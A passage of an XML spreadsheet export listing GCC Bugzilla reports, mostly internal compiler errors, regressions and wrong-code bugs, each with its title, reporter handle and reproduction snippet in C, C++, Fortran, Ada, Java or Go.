  ...
  bl	printf
Moreover is transferring registers between the GP and the FP register files always cheap?  In some x86 processors this used to be accomplished internally through the load-store unit anyway (e.g. Opteron).  How is this accomplished internally in A53 and A57?
Is using the LRA by default clearly beneficial in other cases?
At the Cauldron I mentioned some variables that could be rematerialized when needed instead of being spilled but I could not reproduce that.  I'll try some more to spot this behavior.</t>
  </si>
  <si>
    <t>e.menezes</t>
  </si>
  <si>
    <t>GCC-42288</t>
  </si>
  <si>
    <t>please emit empty .debug_aranges section</t>
  </si>
  <si>
    <t>I have modified gdb to read the .debug_aranges section.
Currently if this information does not exist for a
particular CU gdb must scan the CU to find it.
This is necessary because there is no way to differentiate
between a section that is missing because it has no ranges
and a section that is missing because it was stripped
or simply never created.
It would be helpful to gdb if gcc could emit .debug_aranges
even if there are no ranges to report.</t>
  </si>
  <si>
    <t>GCC-15486</t>
  </si>
  <si>
    <t>[3.3/3.4/4.0 regression] -fdata-sections moves common vars to .bss</t>
  </si>
  <si>
    <t>This is a regression from GCC 3.2.1 (at least).
If I create a file foo.c containing simply:
  int x
and compile it with:
  arm-elf-gcc -c foo.c
then I can get the following with 'arm-elf-nm foo.o'
00000004 C x
However if I compile with
  arm-elf-gcc -c -fdata-sections foo.c
then with arm-elf-nm I get:
00000000 B x
i.e. x is in the BSS. This results in breaking the long-standing behaviour of
common variables being merged. If you typed the following:
cat &gt;foo2.c
int x=0
int main(){
  return x
}
arm-elf-gcc -c -fdata-sections foo.c
arm-elf-gcc -c -fdata-sections foo2.c
arm-elf-gcc -o foo foo.o foo2.o
then you get:
foo2.o(.data.x+0x0): multiple definition of `x'
foo.o(.bss.x+0x0): first defined here
I can see how this behaviour would be beneficial if -fno-common was passed to
gcc and if not using legacy code (actually the real code I'm having trouble
with is derived from a BSD kernel of about 4 years ago so not that old) but in
the absence of -fno-common -fdata-sections should not operate on uninitialised
data. Perhaps the default should be -fno-common and I should be required to
pass -fcommon to get the old behaviour I'm not bothered. Or alternatively
perhaps this treatment of uninitialised data should only happen with a separate
-fbss-sections option (for symmetry with -ffunction-sections and -fdata-sections).</t>
  </si>
  <si>
    <t>GCC-15835</t>
  </si>
  <si>
    <t>label in inline assembler causes Gigi abort Code=516</t>
  </si>
  <si>
    <t>An assembler label inside System.Machine_Code.Asm make GNAT confused.
The label may be local (in the given testcase it is local) or non local.
This is not really an annoying bug so I give it a minor severity.
Futhermore this might be an incorrect use but this is not written anywhere and 
anyway shouldn't make GNAT abort without a good error message.
GCC version:
Reading specs from /usr/lib/gcc/i486-linux/3.4.0/specs
Configured with: ../src/configure -v --enable-languages=cc++javaf77pascal
objcadatreelang --prefix=/usr --libexecdir=/usr/lib 
--with-gxx-include-dir=/usr/include/c++/3.4 --enable-shared --with-system-zlib 
--enable-nls --enable-threads=posix --without-included-gettext 
--program-suffix=-3.4 --enable-__cxa_atexit --enable-clocale=gnu 
--enable-libstdcxx-debug --enable-java-gc=boehm --enable-java-awt=gtk 
--disable-werror i486-linux
Thread model: posix
gcc version 3.4.0 (Debian 20040516)
Command line passed see attached simple example:
$ gnatmake asm_label.adb 
gcc-3.4 -c asm_label.adb
+===========================GNAT BUG DETECTED==============================+
| 3.4.0 (Debian 20040516) (i486-pc-linux-gnu) Gigi abort Code=516         |
| No source file position information available                            |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc-3.4 or gnatmake command that you entered.          |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
+==========================================================================+
Regards
JC</t>
  </si>
  <si>
    <t>jc</t>
  </si>
  <si>
    <t>GCC-30206</t>
  </si>
  <si>
    <t>[4.1 only] Fatal Error: Reading module: Bad name</t>
  </si>
  <si>
    <t>This problem occurs after creating a module file with one compilation and then trying to use that module file in a second compilation as shown below:
# gfortran -I/usr/local/openmpi-1.1.2-gcc/include -c -Wall -Jmod -I. -Imod -g Source/Constants.f90 -o obj/Constants.o
# gfortran -I/usr/local/openmpi-1.1.2-gcc/include -c -Wall -Jmod -I. -Imod -g Source/Timer.f90 -o obj/Timer.o
Fatal Error: Reading module constants at line 3 column 2: Bad name
All Timer.f90 needs to cause the problem is a USE CONSTANTS line.
I'm running gfortran 4.1.0 on RHEL4.
Thanks
       Dennis</t>
  </si>
  <si>
    <t>dmcr</t>
  </si>
  <si>
    <t>GCC-24762</t>
  </si>
  <si>
    <t>[killloop-branch] code motion of non-invariant expressions with hard registers.</t>
  </si>
  <si>
    <t>The killloop-branch produces wrong code for the following test due to a bug in loop-invariant.c or code related to it.
extern C void abort(void)
class runtime_error {}
void test01(int iters)
{
    for (int i = 0   i &lt; iters   ++i)
    {
        try  {
            throw runtime_error()
            abort()
        } catch (runtime_error&amp;) {  }
    }
}
int main(int argc char* argv[])
{
    test01(1)
    return 0
}
The problem is that the following expression is moved out of the loop:
(insn 64 63 54 3 (set (reg:DI 350)
        (reg:DI 16 r16)) 5 {*movdi_internal} (nil)
    (nil))
See the attached dumps.  So far I can only reproduce the bug on IA-64.  Obviously exceptions are involved somehow.  On ia64 there are also over 300 libjava failures that disappear when loop-invariant.c is disabled.</t>
  </si>
  <si>
    <t>GCC-2333</t>
  </si>
  <si>
    <t>ICE in mark_reference_fields</t>
  </si>
  <si>
    <t>This is a recent regression on the branch discovered while
building Jacl.  I've included a minimal test case
below.
I found that a non-record type is passed to push_super_field
causing mark_reference_fields to eventually fail because it
expects a specific layout for the dummy field.  The root cause
is perhaps a failed initialization of C.
Release:
gcc version 3.0 20010319 (prerelease)
Environment:
i686-pc-linux-gnu
How-To-Repeat:
Compile the following code with gcj -c A.java:
class B {
  int b
}
class C {
  int c
}
public class A {
  AI ai
  class AI extends B {
    CI ci
  }
  class CI extends C {
  }
}</t>
  </si>
  <si>
    <t>GCC-6081</t>
  </si>
  <si>
    <t>libjava make install fails: Arg list too long</t>
  </si>
  <si>
    <t>make install fails trying to install in libjava:
make[3]: execvp: /bin/sh: Arg list too long
make[3]: *** [install-data-local] Error 127
Release:
3.1 20020327 (prerelease)
Environment:
System: OSF1 bartok V5.1 732 alpha
Machine: alpha
host: alpha-dec-osf5.1
build: alpha-dec-osf5.1
target: alpha-dec-osf5.1
configured with: /vol/gnu/src/gcc/gcc-3.1-branch-dist/configure --prefix=/vol/gcc --with-local-prefix=/vol/gcc --disable-nls alpha-dec-osf5.1
How-To-Repeat:
Simply bootstrap and run make install.</t>
  </si>
  <si>
    <t>GCC-40836</t>
  </si>
  <si>
    <t>ICE: insn does not satisfy its constraints (iwmmxt_movsi_insn)</t>
  </si>
  <si>
    <t>When trying to build an iwmmxt optimized gcc 4.4.1 build fails in libobjc with an ICE:
  In function 'objc_msg_sendv':
  error: insn does not satisfy its constraints:
  (set (reg/f:SI 13 sp)
          (reg/f:SI 43 wcgr0 [146])) 441 {*iwmmxt_movsi_insn} (nil))
  internal compiler error: in reload_cse_simplify_operands at postreload.c:396
  Please submit a full bug report</t>
  </si>
  <si>
    <t>GCC-32687</t>
  </si>
  <si>
    <t>Invalid code generation for reading signed negative bitfield value (g++ optimization)</t>
  </si>
  <si>
    <t>Reading signed bitfield value when it needs to be extended to larger type (for example assigning 24-bit value to int) results in zero extending instead of sign extending when compiled with g++ using optimizations (-O1 or higher). Compiling the same code with gcc or disabling optimizations makes the problem disappear.
The following code reproduces the problem:
#include 
struct TEST_STRUCT
{
    int f_8  : 8
    int f_24 : 24
}
int main ()
{
    struct TEST_STRUCT x
    int a = -123
    x.f_24 = a
    printf(a=%d (%08X)\n (int)a (int)a)
    printf(x.f_24=%d (%08X)\n (int)x.f_24 (int)x.f_24)
    if ((int)x.f_24 != (int)a)
        printf(test failed\n)
    else
        printf(test ok\n)
    return 0
}
////////////////////////////////
Expected correct result:
a=-123 (FFFFFF85)
x.f_24=-123 (FFFFFF85)
test ok
Faulty result:
a=-123 (FFFFFF85)
x.f_24=16777093 (00FFFF85)
test failed
It is a regression as gcc 3.4.6 did not have this bug. Also this problem may be related to http://gcc.gnu.org/bugzilla/show_bug.cgi?id=32346 and http://gcc.gnu.org/bugzilla/show_bug.cgi?id=30332</t>
  </si>
  <si>
    <t>GCC-5122</t>
  </si>
  <si>
    <t>g77 rejects accepted use of INTEGER*2 as type of DATA statement loop index</t>
  </si>
  <si>
    <t>This program
      CHARACTER*20 PARTD(6)
      INTEGER*2 L
      DATA (PARTD(L)L=116)/'A''B''C''D''E''F'/
      END
draws:
jc.f: In program `MAIN__':
jc.f:3: 
         DATA (PARTD(L)L=116)/'A''B''C''D''E''F'/
                     ^
Invalid declaration of or reference to symbol `l' at (^) [initially seen at (^)]
jc.f:3: 
         DATA (PARTD(L)L=116)/'A''B''C''D''E''F'/
               ^
Expression at (^) has incorrect data type or rank for its context
while it should be accepted (INTEGER*2 is an extension to
FORTRAN 77 that g77 supports).
Release:
g77-2.95 3.0
Environment:
Windows Linux
How-To-Repeat:
g77 jc.f</t>
  </si>
  <si>
    <t>GCC-54790</t>
  </si>
  <si>
    <t>[4.8 Regression] Missing optimization with LTO</t>
  </si>
  <si>
    <t>Created attachment 28337
Testcase #1
GCC 20120916 (r191367) - ok 20120923 (r191654) - bug.
$ gcc -O2 -flto pr54790.c
/tmp/ccTyOv2G.ltrans0.ltrans.o:ccTyOv2G.ltrans0.o:function foo: error: undefined reference to 'link_error'
collect2: error: ld returned 1 exit status</t>
  </si>
  <si>
    <t>GCC-5586</t>
  </si>
  <si>
    <t>Internal compiler error (on code that should fail)</t>
  </si>
  <si>
    <t>g++ -g dbug.cc
dbug.cc: In function `void generate_shortest_paths_tree(vertex &amp;)':
dbug.cc:98: Internal compiler error 390.
dbug.cc:98: Please submit a full bug report.
dbug.cc:98: See  for instructions.
Compilation exited abnormally with code 1 at Sun Feb  3 20:05:02
Release:
gcc version 2.95.3 20010315 (SuSE)
Environment:
SuSE Linux 7.3 running on Celeron processor.
Linux uyea 2.4.16-4GB #1 Tue Dec 25 21:39:59 GMT 2001 i686 unknown
How-To-Repeat:
Recompile the code.</t>
  </si>
  <si>
    <t>j.d.lamb</t>
  </si>
  <si>
    <t>GCC-61623</t>
  </si>
  <si>
    <t>[4.10 Regression] ICE: verify_symtab failed: Two symbols with same comdat_group are not linked by the same_comdat_group list.</t>
  </si>
  <si>
    <t>Created attachment 33012
reduced testcase
Compiler output:
$ gcc -Os testcase.C
testcase.C:7:8: error: Two symbols with same comdat_group are not linked by the same_comdat_group list.
 A a (0)
        ^
_ZN1AC1Ei/8 (A::A(int)) @0x7f200bc92170
  Type: function definition analyzed
  Visibility: externally_visible public weak comdat comdat_group:_ZN1AC5Ei one_only
  Same comdat group as: _ZN1AC2Ei/7
  References: 
  Referring: 
  Availability: available
  First run: 0
  Function flags: body
  Called by: _Z41__static_initialization_and_destruction_0ii/19 (0.07 per call) 
  Calls: _ZN1AC4Ei.isra.0/31 (1.00 per call) 
_ZN1AC1Ei/8 (A::A(int)) @0x7f200bc92170
  Type: function definition analyzed
  Visibility: externally_visible public weak comdat comdat_group:_ZN1AC5Ei one_only
  Same comdat group as: _ZN1AC2Ei/7
  References: 
  Referring: 
  Availability: available
  First run: 0
  Function flags: body
  Called by: _Z41__static_initialization_and_destruction_0ii/19 (0.07 per call) 
  Calls: _ZN1AC4Ei.isra.0/31 (1.00 per call) 
testcase.C:7:8: internal compiler error: verify_symtab failed
0x9407e6 verify_symtab()
        /mnt/svn/gcc-trunk/gcc/symtab.c:1192
0xb45040 symtab_remove_unreachable_nodes(bool _IO_FILE*)
        /mnt/svn/gcc-trunk/gcc/ipa.c:591
0x94e93b ipa_passes
        /mnt/svn/gcc-trunk/gcc/cgraphunit.c:2064
0x94e93b compile()
        /mnt/svn/gcc-trunk/gcc/cgraphunit.c:2186
0x94f3d4 finalize_compilation_unit()
        /mnt/svn/gcc-trunk/gcc/cgraphunit.c:2341
0x72860e cp_write_global_declarations()
        /mnt/svn/gcc-trunk/gcc/cp/decl2.c:4647
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Tested revisions:
r212007 - ICE
4_9 r211338 - OK</t>
  </si>
  <si>
    <t>GCC-47528</t>
  </si>
  <si>
    <t>liblto_plugin.so not found should not to be an fatal error</t>
  </si>
  <si>
    <t>When build gcc without CRT available like mingw-w64:
1. Build Binutils
2. Install mingw-w64-headers
3. Make all-gcc and install-gcc
4. Build mingw-w64 CRT and install
5. Make all-target-libgcc and install-target-libgcc
6. Build pthread and install
7. Make gcc finally and install
In step 4 gcc should create simple C program which need not use CRT functions.
But if gcc configured with enable-lto there will have an fatal error:
i686-w64-mingw32-gcc: fatal error: -fuse-linker-plugin but liblto_plugin.so not found
In my opinion if liblto_plugin.so not found gcc should issued an error message and going on gengerate code without lto support.</t>
  </si>
  <si>
    <t>dongsheng.song</t>
  </si>
  <si>
    <t>GCC-13878</t>
  </si>
  <si>
    <t>Uncaught exception on AIX with shared libraries</t>
  </si>
  <si>
    <t>&gt; g++ -v
Reading specs from /tools/pkg/gcc/3.3.2/lib/gcc-lib/powerpc-ibm-
aix5.1.0.0/3.3.2/specs
Configured with: ../gcc-3.3.2/configure --prefix=/tools/pkg/gcc/3.3.2 --with-
ld=/bin/ld --with-as=/bin/as --enable-languages=cc++f77
Thread model: aix
gcc version 3.3.2
Under some circumstances the GCC runtime environment is unable to find the 
right handler for an exception. I spend some days producing a small testcase. 
With no success. So I debugged the exception handling. 
I found out that one assumption made in the source does not hold for my program:
(from gcc/unwind-dw2-fde.c)
  /* Linear search through the classified objects to find the one
     containing the pc.  Note that pc_begin is sorted descending and
     we expect objects to be non-overlapping.  */
Actually the objects are overlapping. Somehow nearly all libraries share some 
fdes (Frame Descriptor Elements) in the shared memory segment (0xd). There is 
no problem when you have process local shared libraries (segment 0x2). They are 
still overlapping (at the end of the pc range). But the list seen_objects is 
sorted by pc_begin and the right object will be found.
But it is a problem when some shared objects start behind the shared fdes. 
(With behind I mean with a greater pc). Then some libraries have the same 
pc_begin (overlapping at the front) and _Unwind_Find_FDE can find the wrong 
object. 
I made the following workaround to handle this case too. Just search the list 
of seen_objects until search_object finds a fde. This works for me. But I think 
that the real bug lies somewhere else. Perhaps someone with more AIX or 
exception handling experience can say more to it.
*** gcc-3.2.1/gcc/unwind-dw2-fde.c	Mon Jan 21 14:08:31 2002
--- gcc-3.2.1-dbg/gcc/unwind-dw2-fde.c	Wed Jan 21 08:57:10 2004
***************
*** 985991 ****
  	f = search_object (ob pc)
  	if (f)
  	  goto fini
- 	break
        }
    /* Classify and search the objects we've not yet processed.  */
--- 985990 ----</t>
  </si>
  <si>
    <t>GCC-4646</t>
  </si>
  <si>
    <t xml:space="preserve">Internal compiler error when using bit field named 'identity' and #include </t>
  </si>
  <si>
    <t>Reference to a non-existent field named 'identity' in my
code caused 'internal compiler error'.
You have to have 2 things to cause this
1) #include 
2) mystruct.identity = somevalue (where mystruct is a bit structure with a field named 'identity')
if you change the 'id' field in structure XX (see test.cpp attached) to 'identity' you get a parse error ':' from the compiler.
Your compiler asked me to report this so I hope it helps.
Thanks
Raymond Jackson
Release:
gcc version 2.95.2 19991024 (release)
Environment:
Suse Linux 7.1
How-To-Repeat:
g++ -o test test.cpp</t>
  </si>
  <si>
    <t>rjackson</t>
  </si>
  <si>
    <t>GCC-44358</t>
  </si>
  <si>
    <t>[C++0x] initializer list can't convert to map</t>
  </si>
  <si>
    <t>Configured with: ../gcc-svn/configure --prefix=/home/jarryd/local/gcc-4.6 --enable-languages=cc++
g++ init_list.cpp -o init_list.o -std=gnu++0x -c -save-temps
init_list.cpp: In function â€˜int main()â€™:
init_list.cpp:5:41: error: could not convert â€˜{{1 1} {2 2}}â€™ to â€˜std::mapâ€™</t>
  </si>
  <si>
    <t>GCC-8522</t>
  </si>
  <si>
    <t>GCC 3.2: g++ ICE on possibly illegal template class forward declaration</t>
  </si>
  <si>
    <t>g++ asks for submitting a full bug report:
2.cc:2: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]
Release:
3.2
Environment:
System: Linux XXXXXX 2.4.16-4GB #1 Mit Okt 30 14:20:02 CET 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-3.2/configure --prefix=/usr5/xhome/softw1/install-3.2 --enable-threads --enable-shared
How-To-Repeat:
   g++ 2.cc
   FILE 2.cc (2 lines):
1   template class U
2   template class U::G</t>
  </si>
  <si>
    <t>peter.karl.mueller</t>
  </si>
  <si>
    <t>GCC-66533</t>
  </si>
  <si>
    <t>[C++14] ICE: in dependent_type_p at cp/pt.c:21073</t>
  </si>
  <si>
    <t>% echo auto a([](auto) -&gt; decltype((void)0) {}) | g++ -c -x c++ -std=c++14 -
: In lambda function:
:1:20: internal compiler error: in dependent_type_p at cp/pt.c:21073
0x101e01e3 dependent_type_p(tree_node*)
        ../../gcc/gcc/cp/pt.c:21073
0x101a48a7 require_complete_types_for_parms
        ../../gcc/gcc/cp/decl.c:11123
0x101a48a7 check_function_type
        ../../gcc/gcc/cp/decl.c:13272
0x101a48a7 start_preparsed_function(tree_node* tree_node* int)
        ../../gcc/gcc/cp/decl.c:13446
0x102bf6a3 cp_parser_lambda_body
        ../../gcc/gcc/cp/parser.c:9498
0x102bf6a3 cp_parser_lambda_expression
        ../../gcc/gcc/cp/parser.c:9060
0x102bf6a3 cp_parser_primary_expression
        ../../gcc/gcc/cp/parser.c:4453
0x102ce157 cp_parser_postfix_expression
        ../../gcc/gcc/cp/parser.c:6131
0x102d19c7 cp_parser_unary_expression
        ../../gcc/gcc/cp/parser.c:7412
0x102d2eaf cp_parser_binary_expression
        ../../gcc/gcc/cp/parser.c:8147
0x102d391b cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:8404
0x102d3fff cp_parser_constant_expression
        ../../gcc/gcc/cp/parser.c:8650
0x102d55d7 cp_parser_parenthesized_expression_list
        ../../gcc/gcc/cp/parser.c:6880
0x102d68ab cp_parser_initializer
        ../../gcc/gcc/cp/parser.c:19310
0x102f7edb cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:17263
0x102fad43 cp_parser_simple_declaration
        ../../gcc/gcc/cp/parser.c:11608
0x102f26e7 cp_parser_block_declaration
        ../../gcc/gcc/cp/parser.c:11482
0x102ffc8f cp_parser_declaration
        ../../gcc/gcc/cp/parser.c:11379
0x102fdc2f cp_parser_declaration_seq_opt
        ../../gcc/gcc/cp/parser.c:11265
0x102fe013 cp_parser_translation_unit
        ../../gcc/gcc/cp/parser.c:4100
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-20880</t>
  </si>
  <si>
    <t>USE association of procedure's own interface</t>
  </si>
  <si>
    <t>The following is non-standard and the compiler should probably generate a
warning/error with '-pedantic -std=f95'
module test_mod
interface
  subroutine my_sub (a)
    real a
  end subroutine
end interface
end module
subroutine my_sub (a)
  use test_mod
  real a
  print * a
end subroutine
END</t>
  </si>
  <si>
    <t>GCC-49179</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: in evaluate_conditions_for_known_args at ipa-inline-analysis.c:558 with -O -findirect-inlining</t>
  </si>
  <si>
    <t>Created attachment 24365
reduced testcase (from gfortran.dg/assumed_charlen_function_3.f90)
Maybe related to PR49091 it ICEs with the same message.
Compiler output:
$ gcc -O -findirect-inlining testcase.f90
testcase.f90:8:0: internal compiler error: vector VEC(treebase) index domain error in evaluate_conditions_for_known_args at ipa-inline-analysis.c:558
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r174261 - crash
4.6 r173059 - OK</t>
  </si>
  <si>
    <t>GCC-31452</t>
  </si>
  <si>
    <t>FAIL: g++.dg/tree-ssa/pr29585.C (test for excess errors)</t>
  </si>
  <si>
    <t>Executing on host: /mnt/gnu/gcc/objdir/gcc/testsuite/g++/../../g++ -B/mnt/gnu/gc
c/objdir/gcc/testsuite/g++/../../ /mnt/gnu/gcc/gcc/gcc/testsuite/g++.dg/tree-ssa
/pr29585.C  -nostdinc++ -I/mnt/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libstdc++-v3
/include/hppa2.0w-hp-hpux11.11 -I/mnt/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libst
dc++-v3/include -I/mnt/gnu/gcc/gcc/libstdc++-v3/libsupc++ -I/mnt/gnu/gcc/gcc/lib
stdc++-v3/include/backward -I/mnt/gnu/gcc/gcc/libstdc++-v3/testsuite/util -fmess
age-length=0  -O2  -S  -o pr29585.s    (timeout = 300)
/mnt/gnu/gcc/gcc/gcc/testsuite/g++.dg/tree-ssa/pr29585.C:11: warning: 'In' has a
 field 'In::nullout' whose type uses the anonymous namespace
output is:
/mnt/gnu/gcc/gcc/gcc/testsuite/g++.dg/tree-ssa/pr29585.C:11: warning: 'In' has a
 field 'In::nullout' whose type uses the anonymous namespace
FAIL: g++.dg/tree-ssa/pr29585.C (test for excess errors)</t>
  </si>
  <si>
    <t>GCC-12624</t>
  </si>
  <si>
    <t>[3.4 Regression] [unit-at-a-time] ICE in notice_global_symbol</t>
  </si>
  <si>
    <t>As of Wed Oct 15 05:53:46 UTC 2003 I got many
In file included from /net/gnu/export/gnu/src/gcc/gcc/libjava/include/jvm.h:23
                 from /net/gnu/export/gnu/src/gcc/gcc/libjava/jni.cc:18:
./include/java-threads.h:228: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[5]: *** [jni.lo] Error 1
It seems related to
http://gcc.gnu.org/ml/gcc/2003-09/msg00311.html
http://gcc.gnu.org/ml/gcc/2003-09/msg00416.html</t>
  </si>
  <si>
    <t>GCC-44357</t>
  </si>
  <si>
    <t>[4.6 Regression] internal compiler error: in cgraph_decide_inlining_of_small_functions</t>
  </si>
  <si>
    <t>Compiling DwarfException.cpp fails with this error:
	DwarfException.cpp:960:1: internal compiler error: in cgraph_decide_inlining_of_small_functions at ipa-inline.c:1013
but works with gcc version 4.4.4 20100503 (Red Hat 4.4.4-2) (GCC)</t>
  </si>
  <si>
    <t>GCC-25264</t>
  </si>
  <si>
    <t>write to internal unit from the string itself gives wrong result ?</t>
  </si>
  <si>
    <t>Hi!
The following program
program a
   character(len=10) :: str
   str = '123'
   write( str '(ai1)' ) trim(str)4
   print*str
end program a
outputs
[jpr@dhcp-38 fem]$ gfortran -o a a.f90 ./a
 4
all other compilers i've tried (sun f90 xlf g95 ifort) seem to agree the output should be
 1234
Regards Juha</t>
  </si>
  <si>
    <t>GCC-68477</t>
  </si>
  <si>
    <t>error: type variant differs by TYPE_STRING_FLAG.</t>
  </si>
  <si>
    <t>markus@x4 /tmp % cat foo1.go
package foo
import fmt
func test() {
        fmt.Println(lto)
}
markus@x4 /tmp % cat foo2.go
package foo
markus@x4 /tmp % gccgo -flto foo1.go foo2.go
go1: error: type variant differs by TYPE_STRING_FLAG.
 &lt;array_type 0x7efd23c735e8
    type &lt;integer_type 0x7efd23c73540 uint8 readonly unsigned string-flag QI
        size 
        unit size 
        align 8 symtab 0 alias set -1 canonical type 0x7efd23c73540 precision 8 min  max 
        pointer_to_this &gt;
    SI
    size  constant 32&gt;
    unit size  constant 4&gt;
    align 8 symtab 0 alias set -1 canonical type 0x7efd23c735e8
    domain &lt;integer_type 0x7efd23c73498
        type &lt;integer_type 0x7efd23c391f8 sizetype public unsigned DI
            size 
            unit size 
            align 64 symtab 0 alias set -1 canonical type 0x7efd23c391f8 precision 64 min  max &gt;
        DI size  unit size 
        align 64 symtab 0 alias set -1 canonical type 0x7efd23c73498 precision 64 min  max &gt;
    pointer_to_this &gt;
go1: error: TYPE_CANONICAL is not compatible
 &lt;array_type 0x7efd23c735e8
    type &lt;integer_type 0x7efd23c73540 uint8 readonly unsigned string-flag QI
        size 
        unit size 
        align 8 symtab 0 alias set -1 canonical type 0x7efd23c73540 precision 8 min  max 
        pointer_to_this &gt;
    SI
    size  constant 32&gt;
    unit size  constant 4&gt;
    align 8 symtab 0 alias set -1 canonical type 0x7efd23c735e8
    domain &lt;integer_type 0x7efd23c73498
        type &lt;integer_type 0x7efd23c391f8 sizetype public unsigned DI
            size 
            unit size 
            align 64 symtab 0 alias set -1 canonical type 0x7efd23c391f8 precision 64 min  max &gt;
        DI size  unit size 
        align 64 symtab 0 alias set -1 canonical type 0x7efd23c73498 precision 64 min  max &gt;
    pointer_to_this &gt;
 &lt;array_type 0x7efd23c73738
    type &lt;integer_type 0x7efd23c73540 uint8 readonly unsigned string-flag QI
        size 
        unit size 
        align 8 symtab 0 alias set -1 canonical type 0x7efd23c73540 precision 8 min  max 
        pointer_to_this &gt;
    string-flag SI
    size  constant 32&gt;
    unit size  constant 4&gt;
    align 8 symtab 0 alias set -1 canonical type 0x7efd23c735e8
    domain &lt;integer_type 0x7efd23c73498
        type &lt;integer_type 0x7efd23c391f8 sizetype public unsigned DI
            size 
            unit size 
            align 64 symtab 0 alias set -1 canonical type 0x7efd23c391f8 precision 64 min  max &gt;
        DI size  unit size 
        align 64 symtab 0 alias set -1 canonical type 0x7efd23c73498 precision 64 min  max &gt;
    pointer_to_this &gt;
go1: internal compiler error: verify_type failed
0xd8026c verify_type(tree_node const*)
        ../../gcc/gcc/tree.c:13818
0xd81f93 free_lang_data_in_cgraph
        ../../gcc/gcc/tree.c:5953
0xd81f93 free_lang_data
        ../../gcc/gcc/tree.c:5983
0xd81f93 execute
        ../../gcc/gcc/tree.c:6032</t>
  </si>
  <si>
    <t>GCC-30233</t>
  </si>
  <si>
    <t>internal compiler error: in vect_stmt_relevant_p at tree-vect-analyze.c:1514 with -O3 -msse -ftree-loop-linear -ftree-vectorize</t>
  </si>
  <si>
    <t>I tried to compile gimp-2.2.13 with this script:
#!/bin/sh
_cflags=-O3 -m32 -mmmx -msse -m3dnow -msse -funroll-all-loops -floop-optimize2  -ftree-ccp -ftree-ch -ftree-combine-temps -ftree-copy-prop -ftree-copyrename -ftree-dce -ftree-dominator-opts -ftree-dse -ftree-fre -ftree-loop-im -ftree-loop-ivcanon -ftree-loop-linear -ftree-loop-optimize -ftree-lrs -ftree-pre -ftree-salias -ftree-sink -ftree-sra -ftree-store-ccp -ftree-store-copy-prop -ftree-ter -ftree-vect-loop-version -ftree-vrp -fbranch-target-load-optimize2 -ftree-vectorize -mfpmath=387sse -ffast-math -mfancy-math-387 -march=athlon-xp -fomit-frame-pointer -pipe
CFLAGS=$_cflags
CXXFLAGS=$_cflags
CXX=g++4 CC=gcc4 ./configure $*
and received the next error:
maze.c: In function 'run':
maze.c:179: internal compiler error: in vect_stmt_relevant_p at tree-vect-analyze.c:1514
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [maze.o] Error 1
make[3]: Leaving directory `/tmp/gimp-2.2.13/plug-ins/maze'
make[2]: *** [all-recursive] Error 1
make[1]: *** [all-recursive] Error 1
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>GCC-41235</t>
  </si>
  <si>
    <t>Missing explicit interface for variable-length character functions</t>
  </si>
  <si>
    <t>From http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/d710371aed91e75f#
The following program is invalid. This is diagnosed at compile time by ifort
test.f90(19): error #6832: This passed length character name has been used in an invalid context.   [BIGFUNC]
   character(i) bigfunc
----------------^
and NAG f95
Error: test.f90: CHARACTER*1024 function BIGFUNC referenced with non-constant length from LEVEL1
and open95
openf95-916 openf95: ERROR LEVEL1 File = test.f90 Line = 19 Column = 17
  BIGFUNC has a variable length character result therefore it must have an explicit interface.
and g95
   character(i) bigfunc
                1
Error: Nonconstant character function 'bigfunc' at (1) must have an explicit interface
But not in gfortran - even not with -fwhole-file -fcheck=all.
program main
   implicit none
   character(4) level1
   character(4) answer
   integer i
   do i = 1024 1 -1023
      write(*'(ai0)') 'Invoking level1 with i = ' i
      answer = level1(i)
      write(*'(a)') 'Back from level1'
      write(*'(ai02a)') 'i = ' i ' answer = ' answer
   end do
end program main
function level1(i)
   implicit none
   integer i
   character(4) level1
   character(i) bigfunc
   level1 = bigfunc()
end function level1
function bigfunc()
   implicit none
   character(1024) bigfunc
   bigfunc = repeat('b'len(bigfunc))
end function bigfunc</t>
  </si>
  <si>
    <t>GCC-68710</t>
  </si>
  <si>
    <t>flexible array member of a base class accepted in a non-empty derived class</t>
  </si>
  <si>
    <t>G++ accepts definitions of non-empty derived classes whose base class contains a flexible array member.  While such base classes are valid on their own (for compatibility with C) they cannot be derived from by non-empty classes that contain data members of their own since accessing elements of the base class would make it possible to access the derived class.  The following example shows why such constructs need to be rejected.  The output shows that modifying elements of the flexible array member modifies other members of the object.  The abort implies that GCC itself assumes that flexible array members do not alias other members of the same object.
$ cat z.cpp &amp;&amp; /build/gcc-trunk-svn/gcc/xgcc -B /build/gcc-trunk-svn/gcc -O2 -Wall -Wextra -Wpedantic -L ~/bin/gcc-5.1.0/lib64 -xc++ z.cpp &amp;&amp; ./a.out
struct A {
    const char *a
    const char *b[]
}
struct B: A {
    const char *c
}
extern C {
    void free (void*)
    void* malloc (__SIZE_TYPE__)
    int printf (const char* ...)
}
void foo (B *b)
{
    const char* const s = 
    b-&gt;c = s
    b-&gt;b [0] = 0
    if (b-&gt;c != s)
        __builtin_abort () 
}
int main ()
{
    B *b = (B*)malloc (sizeof *b + 2 * sizeof *b-&gt;b)
    b-&gt;a = a
    b-&gt;c = c
    b-&gt;b [0] = b[0]
    b-&gt;b [1] = b[1]
    b-&gt;b [2] = b[2]
    b-&gt;b [3] = b[3]
    printf ({ { a = %s b = { %s %s %s %s } } c = %s }\n
            b-&gt;a b-&gt;b[0] b-&gt;b[1] b-&gt;b[2] b-&gt;b[3] b-&gt;c)
    foo (b)
    free (b)
}
